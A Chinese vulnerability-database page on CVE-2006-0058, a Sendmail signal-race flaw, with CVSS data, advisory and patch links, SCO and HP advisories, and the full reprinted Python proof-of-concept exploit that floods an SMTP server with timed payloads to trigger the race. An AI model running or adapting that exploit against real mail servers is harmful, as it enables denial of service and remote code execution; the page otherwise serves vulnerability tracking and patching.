CVE-2006-0058
CVSS7.6
发布时间 :2006-03-22 15:06:00
修订时间 :2011-03-07 21:29:14
NMCOEPS    

[原文]Signal handler race condition in Sendmail 8.13.x before 8.13.6 allows remote attackers to execute arbitrary code by triggering timeouts in a way that causes the setjmp and longjmp function calls to be interrupted and modify unexpected memory locations.


[CNNVD]Sendmail异步信号处理竞争条件漏洞(CNNVD-200603-374)

        Sendmail是很多大型站点都在使用的邮件传输代理(MTA)。
        Sendmail在接收和处理远程客户端的邮件数据时存在信号竞争漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        Sendmail使用信号处理器来处理非异步安全的超时,该信号处理器的某些函数中断会导致静态数据元素处于不一致的状态。攻击者可以利用这些数据元素向堆或栈中的无效部分写入数据,这样就可以完全控制有漏洞的进程。

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sendmail:sendmail:8.13.1Sendmail Sendmail 8.13.1
cpe:/a:sendmail:sendmail:8.13.5Sendmail Sendmail 8.13.5
cpe:/a:sendmail:sendmail:8.13.4Sendmail Sendmail 8.13.4
cpe:/a:sendmail:sendmail:8.13.3Sendmail Sendmail 8.13.3
cpe:/a:sendmail:sendmail:8.13.0Sendmail Sendmail 8.13.0
cpe:/a:sendmail:sendmail:8.13.2Sendmail Sendmail 8.13.2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1689Sendmail setjmp longjmp bo (Red Hat Internal)
oval:org.mitre.oval:def:11074Signal handler race condition in Sendmail 8.13.x before 8.13.6 allows remote attackers to execute arbitrary code by triggering timeouts in a...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0058
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0058
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-374
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-081A.html
(UNKNOWN)  CERT  TA06-081A
http://www.kb.cert.org/vuls/id/834865
(UNKNOWN)  CERT-VN  VU#834865
http://www.redhat.com/support/errata/RHSA-2006-0265.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2006:0265
http://www.redhat.com/support/errata/RHSA-2006-0264.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2006:0264
http://www.vupen.com/english/advisories/2006/2490
(UNKNOWN)  VUPEN  ADV-2006-2490
http://www.vupen.com/english/advisories/2006/2189
(UNKNOWN)  VUPEN  ADV-2006-2189
http://www.vupen.com/english/advisories/2006/1529
(UNKNOWN)  VUPEN  ADV-2006-1529
http://www.vupen.com/english/advisories/2006/1157
(UNKNOWN)  VUPEN  ADV-2006-1157
http://www.vupen.com/english/advisories/2006/1139
(UNKNOWN)  VUPEN  ADV-2006-1139
http://www.vupen.com/english/advisories/2006/1072
(UNKNOWN)  VUPEN  ADV-2006-1072
http://www.vupen.com/english/advisories/2006/1068
(UNKNOWN)  VUPEN  ADV-2006-1068
http://www.vupen.com/english/advisories/2006/1051
(UNKNOWN)  VUPEN  ADV-2006-1051
http://www.vupen.com/english/advisories/2006/1049
(UNKNOWN)  VUPEN  ADV-2006-1049
http://www.sendmail.com/company/advisory/index.shtml
(UNKNOWN)  CONFIRM  http://www.sendmail.com/company/advisory/index.shtml
http://www.securityfocus.com/archive/1/428536/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060322 sendmail vuln advisories (CVE-2006-0058)
http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.007-sendmail.html
(UNKNOWN)  OPENPKG  OpenPKG-SA-2006.007
http://www.iss.net/threats/216.html
(UNKNOWN)  ISS  20060322 Sendmail Remote Signal Handling Vulnerability
http://www.gentoo.org/security/en/glsa/glsa-200603-21.xml
(UNKNOWN)  GENTOO  GLSA-200603-21
http://www.debian.org/security/2006/dsa-1015
(UNKNOWN)  DEBIAN  DSA-1015
http://sunsolve.sun.com/search/document.do?assetkey=1-66-200494-1
(UNKNOWN)  SUNALERT  200494
http://secunia.com/advisories/19367
(UNKNOWN)  SECUNIA  19367
http://secunia.com/advisories/19363
(UNKNOWN)  SECUNIA  19363
http://secunia.com/advisories/19342
(UNKNOWN)  SECUNIA  19342
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00692635
(UNKNOWN)  HP  HPSBTU02116
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c00629555
(UNKNOWN)  HP  HPSBUX02108
http://xforce.iss.net/xforce/xfdb/24584
(UNKNOWN)  XF  smtp-timeout-bo(24584)
http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=2751
(UNKNOWN)  CONFIRM  http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=2751
http://www14.software.ibm.com/webapp/set2/sas/f/hmc/power5/install/v52.Readme.html#MH00688
(UNKNOWN)  CONFIRM  http://www14.software.ibm.com/webapp/set2/sas/f/hmc/power5/install/v52.Readme.html#MH00688
http://www.securityfocus.com/bid/17192
(UNKNOWN)  BID  17192
http://www.securityfocus.com/archive/1/archive/1/428656/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:186277
http://www.redhat.com/archives/fedora-announce-list/2006-April/msg00018.html
(UNKNOWN)  FEDORA  FEDORA-2006-193
http://www.redhat.com/archives/fedora-announce-list/2006-April/msg00017.html
(UNKNOWN)  FEDORA  FEDORA-2006-194
http://www.osvdb.org/24037
(UNKNOWN)  OSVDB  24037
http://www.openbsd.org/errata38.html#sendmail
(UNKNOWN)  OPENBSD  [3.8] 006: SECURITY FIX: March 25, 2006
http://www.novell.com/linux/security/advisories/2006_17_sendmail.html
(UNKNOWN)  SUSE  SUSE-SA:2006:017
http://www.mandriva.com/security/advisories?name=MDKSA-2006:058
(UNKNOWN)  MANDRIVA  MDKSA-2006:058
http://www.f-secure.com/security/fsc-2006-2.shtml
(UNKNOWN)  CONFIRM  http://www.f-secure.com/security/fsc-2006-2.shtml
http://www.ciac.org/ciac/bulletins/q-151.shtml
(UNKNOWN)  CIAC  Q-151
http://www-1.ibm.com/support/search.wss?rs=0&q=IY82994&apar=only
(UNKNOWN)  AIXAPAR  IY82994
http://www-1.ibm.com/support/search.wss?rs=0&q=IY82993&apar=only
(UNKNOWN)  AIXAPAR  IY82993
http://www-1.ibm.com/support/search.wss?rs=0&q=IY82992&apar=only
(UNKNOWN)  AIXAPAR  IY82992
http://support.avaya.com/elmodocs2/security/ASA-2006-078.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-078.htm
http://support.avaya.com/elmodocs2/security/ASA-2006-074.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-074.htm
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102324-1
(UNKNOWN)  SUNALERT  102324
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102262-1
(UNKNOWN)  SUNALERT  102262
http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.619600
(UNKNOWN)  SLACKWARE  SSA:2006-081-01
http://securitytracker.com/id?1015801
(UNKNOWN)  SECTRACK  1015801
http://securityreason.com/securityalert/743
(UNKNOWN)  SREASON  743
http://securityreason.com/securityalert/612
(UNKNOWN)  SREASON  612
http://secunia.com/advisories/20723
(UNKNOWN)  SECUNIA  20723
http://secunia.com/advisories/20243
(UNKNOWN)  SECUNIA  20243
http://secunia.com/advisories/19774
(UNKNOWN)  SECUNIA  19774
http://secunia.com/advisories/19676
(UNKNOWN)  SECUNIA  19676
http://secunia.com/advisories/19533
(UNKNOWN)  SECUNIA  19533
http://secunia.com/advisories/19532
(UNKNOWN)  SECUNIA  19532
http://secunia.com/advisories/19466
(UNKNOWN)  SECUNIA  19466
http://secunia.com/advisories/19450
(UNKNOWN)  SECUNIA  19450
http://secunia.com/advisories/19407
(UNKNOWN)  SECUNIA  19407
http://secunia.com/advisories/19404
(UNKNOWN)  SECUNIA  19404
http://secunia.com/advisories/19394
(UNKNOWN)  SECUNIA  19394
http://secunia.com/advisories/19368
(UNKNOWN)  SECUNIA  19368
http://secunia.com/advisories/19361
(UNKNOWN)  SECUNIA  19361
http://secunia.com/advisories/19360
(UNKNOWN)  SECUNIA  19360
http://secunia.com/advisories/19356
(UNKNOWN)  SECUNIA  19356
http://secunia.com/advisories/19349
(UNKNOWN)  SECUNIA  19349
http://secunia.com/advisories/19346
(UNKNOWN)  SECUNIA  19346
http://secunia.com/advisories/19345
(UNKNOWN)  SECUNIA  19345
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00692635
(UNKNOWN)  HP  HPSBTU02116
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c00629555
(UNKNOWN)  HP  HPSBUX02108
ftp://patches.sgi.com/support/free/security/advisories/20060401-01-U
(UNKNOWN)  SGI  20060401-01-U
ftp://patches.sgi.com/support/free/security/advisories/20060302-01-P
(UNKNOWN)  SGI  20060302-01-P
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.24/SCOSA-2006.24.txt
(UNKNOWN)  SCO  SCOSA-2006.24
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2006-010.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2006-010
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:13.sendmail.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-06:13

- 漏洞信息

Sendmail异步信号处理竞争条件漏洞
高危 竞争条件
2006-03-22 00:00:00 2006-03-27 00:00:00
远程  
        Sendmail是很多大型站点都在使用的邮件传输代理(MTA)。
        Sendmail在接收和处理远程客户端的邮件数据时存在信号竞争漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        Sendmail使用信号处理器来处理非异步安全的超时,该信号处理器的某些函数中断会导致静态数据元素处于不一致的状态。攻击者可以利用这些数据元素向堆或栈中的无效部分写入数据,这样就可以完全控制有漏洞的进程。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        OpenBSD OpenBSD 3.0
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patc h
        IBM AIX 5.1
        IBM IY82992
        AIX 5.1.0:
        http://www.ibm.com/servers/eserver/support/unixservers/aixfixes.html
        IBM sendmail_vu834865.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/sendmail_vu834865.tar.Z
        HP HP-UX B.11.11
        HP PHNE_35484
        http://itrc.hp.com
        OpenBSD OpenBSD 3.1
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patc h
        HP HP-UX B.11.00
        HP PHNE_35483
        http://itrc.hp.com
        OpenBSD OpenBSD 3.5
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patc h
        OpenBSD OpenBSD 2.3
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patc h
        OpenBSD OpenBSD 2.5
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patc h
        FreeBSD FreeBSD 4.8 -PRERELEASE
        FreeBSD sendmail.patch
        sendmail.patch has been verified to apply to FreeBSD 5.1, 4.8,and 4.7 systems.
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:13/sendmail.patch
        FreeBSD sendmail.patch.asc
        sendmail.patch has been verified to apply to FreeBSD 5.1, 4.8,and 4.7 systems.
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:13/sendmail.patch .asc
        FreeBSD FreeBSD 4.8
        FreeBSD sendmail.patch
        sendmail.patch has been verified to apply to FreeBSD 5.1, 4.8,and 4.7 systems.
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:13/sendmail.patch
        FreeBSD sendmail.patch.asc
        sendmail.patch has been verified to apply to FreeBSD 5.1, 4.8,and 4.7 systems.
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:13/sendmail.patch .asc
        SCO Unixware 7.1.4
        SCO SCOSA-2006.24
        UnixWare 7.1.3, 7.14
        ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.24
        Sendmail Consortium Sendmail 8.11.2
        Sendmail Consortium Sendmail 8.13.6
        ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.13.6.tar.gz
        Sendmail Consortium Sendmail 8.12 beta5
        Sendmail Consortium Sendmail 8.13.6
        ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.13.6.tar.gz
        Sendmail Consortium Sendmail 8.12.1
        Mandriva sendmail-8.12.11-1.1.M20mdk.i586.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-8.12.11-1.1.M20mdk.src.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-cf-8.12.11-1.1.M20mdk.i586.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-devel-8.12.11-1.1.M20mdk.i586.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-doc-8.12.11-1.1.M20mdk.i586.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Sendmail Consortium Sendmail 8.13.6
        ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.13.6.tar.gz
        Slackware sendmail-8.13.6-i486-1.tgz
        Slackware 9.1:
        ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/s endmail-8.13.6-i486-1.tgz
        Slackware sendmail-cf-8.13.6-noarch-1.tgz
        Slackware 9.1:
        ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/s endmail-8.13.6-i486-1.tgz
        Sendmail Consortium Sendmail 8.12.11
        Mandriva sendmail-8.12.11-1.1.C30mdk.i586.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-8.12.11-1.1.C30mdk.src.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-8.12.11-1.1.C30mdk.x86_64.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-cf-8.12.11-1.1.C30mdk.i586.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-cf-8.12.11-1.1.C30mdk.x86_64.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-devel-8.12.11-1.1.C30mdk.i586.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-devel-8.12.11-1.1.C30mdk.x86_64.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-doc-8.12.11-1.1.C30mdk.i586.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-doc-8.12.11-1.1.C30mdk.x86_64.

- 漏洞信息 (2051)

Sendmail <= 8.13.5 Remote Signal Handling Exploit PoC (EDBID:2051)
linux dos
2006-07-21 Verified
0 redsand
N/A [点击下载]
#!/usr/bin/env python
#
# redsand@blacksecurity.org
# Sendmail 8.13.5 and below Remote Signal Handling exploit
# usage: rbl4ck-sendmail.py 127.0.0.1 0 25
#
#

# this exploit was leaked to the PHC (Phrack High Council)
# so instead of only letting them have a copy, we figure
# everyone should have what they have.
#
# :-)

#
# several of the tested operating systems appear to crash at a static
# string in memory and we were unable to shift the location of that crash.
# However, Fedora gives us a nice sexy soft spot to land, one that allows us
# to control the flow of code execution
# this is only a proof of concept
#

import os, sys, socket, time, select, string, errno, threading

IP="127.0.0.1"
PORT=25
fromdd = "w00t@bex.redsand.net"
def_arch = 0
def_timeout = (60 * 60) * 2 # 2 hrs
#def_timeout = 5 # 5 seconds
domain = "localhost"
total_time = None
threshold = 2.5

guess_timeout = 4.0

threads = 40

arch = [ 
	{ 'OS':'Debian 3.0-r1', 'offset':190, 'pad':28, 'return':0xbfbfdad1L }
	]

argc = len(sys.argv)
if(argc > 1):
	IP = sys.argv[1]

if(argc > 2):
	def_arch = int(sys.argv[2])

if(argc > 3):
	PORT = int(sys.argv[3])

def	ia32(o):
	s=''
	w=chr(i % 256)
	o = o >> 8
	x=chr(i % 256)
	o = o >> 8
	y=chr(i % 256)
	o = o >> 8
	z=chr(i % 256)

	s = "%c%c%c%c" % (w,x,y,z)
	return s

def	substr(i, str, off):
	top=i[:off]
	end=i[off+len(str):]
	s = top + str + end
	return s
	


def	rout( str):
	print ("[bl4ck]: " + str)

def	mbanner():
	rout("Sendmail 8.13.5 and below Remote Signal Handling exploit by redsand@blacksecurity.org")
	rout("Supported Operating Systems:")
	p = 0
	for i in arch:
		rout("{%r} %s" % (p, i['OS']))
		p += 1

def	rsend( s, str, p=True):
	sent = s.send(str )
	#sent = s.send(str + "\r\n")
	if sent == 0:
		rout("socket send() failed")
	if(p):
		rout("Sent Request: \r\n\r\n%s\r\n" % str)

def	probe(sock):
	str = "HELO blacksecurity.org\r\nMAIL FROM: <%s>\r\nRCPT TO: root@%s\r\nDATA\r\n" % (fromdd,domain)
	rsend(sock,str)


def	payload(size=32764):
	ret = "\x7f" * size
	i = 0
	while i < size :
		ret = substr(ret,": ",100 + i)
		ret = substr(ret,"\r\n",200 + i)
		i += 202

	ret += "\r\n"
	return ret


class rSendmail( threading.Thread) :

	thres = threshold
	do_exit = False
	btime = None
	etime = None
	state = 0
	total_time = 0

	def	__init__(self, thresh=0):
		if not thresh == 0:
			self.thres = thresh
		threading.Thread.__init__ ( self )


	def     rrecv(self,s, response=None):
        	buf = ''
        	try:
	                buf = s.recv(2048)
	        except socket.error, (ecode, reason):
	                #rout("Socket failure %r:%s" % (ecode, reason))
	                return False

        	if buf == '':
                	return False

        	rout("Reading response: \r\n\r\n%s\r\n" % buf[0:-2])
       		msg = buf[0:-2].split("\r\n")
        	for m in msg:

                	k = m[0:3]
                	if (k != None) and (k != '') and (k != "\x7f\x7f\x7f"):
                        	code = int(m[0:3])
                	else:
                        	code = 0

                	if( code == 354 and self.state == 0 ):
                        	self.btime = time.time()
                        	self.state += 1
                        	return True
                	elif( code == 451 and self.state == 1):
                        	self.etime = time.time()
                        	self.state += 1
	                        return True
       	        	elif( code == 451 and self.state == 4):
                        	self.state += 1
                        	return True
                	elif( code == 354 and self.state == 3):
                        	self.state += 1
                        	return True

                	if (self.state == 5):
                        	self.state += 1
                        	rout("Debug error, unable to escalate state")
				self.stop()
				return False

	        if(response != None):
       	        	rsend(s,response)

	def stop(self):
		self.do_exit = True


	def run (self ):

		rout("Connecting to %s:%r" % (IP,PORT))

		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		sock.setblocking(0) # non-blocking 0hn0

		try:
			sock.connect((IP, PORT))
		except socket.error, (ecode, reason):
			if ecode in (115, 150): pass
			else:
				rout("Error %r:%s" % (ecode,reason))
				return
	
			ret = select.select([sock],[sock],[], def_timeout)
	
			if len(ret[1]) == 0 and len (ret[0]) == 0:
				sock.close()
				rout("Timed out on connect")
				return
	
		rout("Setting non-blocking options with a default timeout of %r seconds" % def_timeout)
	
		xplbuf = "\xAF\xBE\xAD\xDE"

		probe1 = False
		probe2 = False
		pump = False
	
		while not self.do_exit:
		
			readsock, writesock, err = select.select([sock],[sock],[], def_timeout)
			if len(readsock) > 0:
				for s in readsock:
					self.rrecv(s)
	
			if len(writesock) > 0:
				for s in writesock:
					if(self.state == 0):
						if not probe1:
							probe(s) # rsend(s,"HELO")
							probe1 = True
						break
	
					if(self.state == 1):
						if not pump:
							pump = True
							time.sleep(guess_timeout - (0.9))
							rsend(s,payload(32764) + "\r\n", False)
							rout("Sending heavy load")
	
						break
	
					if(self.state == 2):
					# measure timeout
					# wait = end - start  
					# where end is time of code 451 & start is 354 go ahead
						self.total_time = (self.etime - self.btime) + self.thres
						#self.total_time = (self.etime - self.btime)
						self.state += 1
		
					if(self.state == 3):
						if not probe2:
							rsend(s,"\n")
							probe(s)
							probe2 = True
						break
		
					if(self.state == 4):
						## race here
						# send bad header
						# lets wait 
						rsend(s, xplbuf + "\r\n")
						rout("Sleeping...")
						time.sleep(self.total_time)
						rsend(s, xplbuf + "\r\n")
		
						rout("Sent race-request")
						self.state = 5
						break
		
					if(self.state == 5):
						rout("State reached stage: %r" % self.state)
						rout("Total wait time: %s" % self.total_time)
						self.stop()
						break

		self.stop()
		return
					



mbanner()

t_list = []

t = threshold

opc = 0

while threading.activeCount() < threads:
	opc += 1 
	rout("Starting Thread: %r with time+offset: %r" % (opc, t))
        m = rSendmail(t)
        m.start()
        t += 0.2
	time.sleep(5)


sys.exit(5) # success ??

"""
buf = ""
atom = "\\\xff" * int(arch[def_arch]['pad'])
idx = 256 * 4
newtag=substr(xpl[idx:],ia32(arch[def_arch]['return']), int(arch[def_arch]['offset']))
xpl=substr(xpl, newtag, idx)
xpl=substr(xpl,atom,len(xpl))
"""

# milw0rm.com [2006-07-21]
		

- 漏洞信息 (F48476)

rbl4ck_sendmail.tgz (PacketStormID:F48476)
2006-07-24 00:00:00
redsand  blacksecurity.org
exploit,remote
CVE-2006-0058
[点击下载]

Remote signal handling exploit for Sendmail versions 8.13.5 and below.

- 漏洞信息 (F46614)

SCOSA-2006.24.txt (PacketStormID:F46614)
2006-05-24 00:00:00
SCO  sco.com
advisory,remote,arbitrary,root
CVE-2006-0058
[点击下载]

SCO Security Advisory SCOSA-2006.24 - Sendmail could allow a remote attacker to execute arbitrary code as root, caused by a signal race vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________


                        SCO Security Advisory


Subject:                Sendmail Arbitrary Code Execution Vulnerability
Advisory number:        SCOSA-2006.24
Issue date:             2006 May 21
Cross reference:        fz533700
                        CVE-2006-0058
______________________________________________________________________________


1. Problem Description

        Sendmail could allow a remote attacker to execute arbitrary code as
        root, caused by a signal race vulnerability. 
	
        The Common Vulnerabilities and Exposures project
        (cve.mitre.org) has assigned the name CVE-2006-0058 to
        this issue.


2. Vulnerable Supported Versions

        System                          Binaries
        ----------------------------------------------------------------------
        UnixWare 7.1.3                  sendmail
                                        mailstats
                                        praliiases
                                        rmail
                                        smrsh
                                        makemap
        UnixWare 7.1.4                  sendmail
                                        mailstats
                                        praliiases
                                        rmail
                                        smrsh
                                        makemap


3. Solution

        The proper solution is to install the latest packages.


4. UnixWare 7.1.3

        4.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.24


        4.2 Verification

        MD5 (p533700.713.image) = 2c33879a5f676c79efe1e78cadb2aeb8

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools


        4.3 Installing Fixed Binaries

        The following packages should be installed on your system before
        you install this fix:

                UnixWare 7.1.3 Maintenance Pack 5
                http://www.sco.com/support/update/download/release.php?rid=96

        Upgrade the affected binaries with the following sequence:

        Download p533700.713.image to the /var/spool/pkg directory

        # pkgadd -d /var/spool/pkg/p533700.713.image


5. UnixWare 7.1.4

        5.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.24


        5.2 Verification

        MD5 (p533700.714.image) = 0a3a7c95a68e1ca3e5916e40e9dfa0ae

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools


        5.3 Installing Fixed Binaries

        The following packages should be installed on your system before
        you install this fix:

                UnixWare 7.1.4 Maintenance Pack 3
                http://www.sco.com/support/update/download/release.php?rid=126

        Upgrade the affected binaries with the following sequence:

        Download p533700.714.image to the /var/spool/pkg directory

        # pkgadd -d /var/spool/pkg/p533700.714.image


6. References

        Specific references for this advisory:
                http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0058
                http://www.securityfocus.com/archive/1/428536/100/0/threaded
                http://www.sendmail.org/

        SCO security resources:
                http://www.sco.com/support/security/index.html

        SCO security advisories via email
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents fz533700.


7. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers intended
        to promote secure installation and use of SCO products.


8. Acknowledgments

        Marc Bejarano is credited with the discovery of this vulnerability.


______________________________________________________________________________
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (SCO_SV)

iD8DBQFEcSxeaqoBO7ipriERAtnOAJ4l8SWkkFxTYf8T8iD9P4UFQBqX0QCfZld8
m4gPf3unHlkCKdp/9PbXL9Y=
=vpKs
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F46511)

HP Security Bulletin 2006-11.33 (PacketStormID:F46511)
2006-05-22 00:00:00
Hewlett Packard  hp.com
advisory,remote,arbitrary
CVE-2006-0058
[点击下载]

HP Security Bulletin - A vulnerability has been identified in Sendmail which may allow a remote attacker to execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00629555

Version: 11

HPSBUX02108 SSRT061133 rev.11 - HP-UX Running Sendmail,
Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-05-03
Last Updated: 2006-05-18

Potential Security Impact: Remote Execution of Arbitrary Code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A vulnerability has been identified in Sendmail which may allow a
remote attacker to execute arbitrary code.

References: CVE-2006-0058

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, B.11.23.

BACKGROUND

CERT has published a vulnerability report available at:
http://www.kb.cert.org/vuls/id/834865

This bulletin will be revised as other versions of Sendmail
become available.

To determine if an HP-UX system has an affected version,
search the output of "swlist -a revision -l fileset"
for one of the filesets listed below. For affected systems
verify that the recommended action has been taken.

AFFECTED VERSIONS

For sendmail 8.13.3
HP-UX B.11.23
==========
SMAIL-UPGRADE.INET-SMAIL
SMAIL-UPGRADE.INET2-SMAIL
action: install revision B.11.23.01.002 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
URL: ftp://sendmail:sendmail@hprc.external.hp.com/sendmail-8.13_1123.depot

HP-UX B.11.11
==========
SMAIL-UPGRADE.INETSVCS-SMAIL
action: install revision B.11.11.02.002 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
URL: ftp://sendmail:sendmail@hprc.external.hp.com/sendmail-8.13_1111.depot

For sendmail 8.11.1
HP-UX B.11.23
==========
InternetSrvcs.INETSVCS2-RUN
 ->action: remove UNOF_INET31734_3.depot if installed,
install UNOF_INET31734_4.depot or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
 ->URL: ftp://sendmail:sendmail@hprc.external.hp.com/UNOF_INET31734_4.depot

HP-UX B.11.11
==========
SMAIL-811.INETSVCS-SMAIL
 ->action: install revision B.11.11.01.009 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
 ->URL: ftp://sendmail:sendmail@hprc.external.hp.com/sendmail-811_09.depot

HP-UX B.11.00
==========
SMAIL-811.INETSVCS-SMAIL
 ->action: install revision B.11.00.01.008 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
 ->URL: ftp://sendmail:sendmail@hprc.external.hp.com/sendmail-811_01.008.depot

For sendmail 8.9.3
HP-UX B.11.11
==========
InternetSrvcs.INETSVCS-RUN
 ->action: remove UNOF_INET_29774_3.depot if installed,
install PHNE_31917 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.

HP-UX B.11.00
==========
InternetSrvcs.INETSVCS-RUN
 ->action: remove UNOF_INET_29773_3.depot if installed,
install PHNE_32006 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.

For sendmail 8.8.6
HP-UX B.11.00
==========
InternetSrvcs.INETSVCS-RUN
 ->action: remove UNOF_INET_29773_3.depot if installed,
install PHNE_32006 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.


END AFFECTED VERSIONS

RESOLUTION

HP has made the following software updates and patches available
to resolve the issue.

The patches are available from http://itrc.hp.com

The software updates can be downloaded via ftp from:

System: hprc.external.hp.com (192.170.19.100)
Login: sendmail
Password: sendmail (NOTE: CASE-sensitive)

ftp://sendmail:sendmail@hprc.external.hp.com
or
ftp://sendmail:sendmail@192.170.19.100

The cksum and md5 output for the preliminary depots are listed below.
The cksum and md5 output are also found the README.txt.pgp on the ftp site.

For sendmail 8.13.3, HP-UX B.11.23

sendmail-8.13_1123.depot
cksum 692720776 15759360
md5 E09933A4AECC16B97A8F7ACF07060F84
sendmail -bs banner:
Sendmail version 8.13.3 - Revision 2.002_Beta - 2006/03/25
what(1) string:
Sendmail version 8.13.3 - Revision 2.002_Beta - 2006/03/25

For sendmail 8.13.3, HP-UX B.11.11

sendmail-8.13_1111.depot
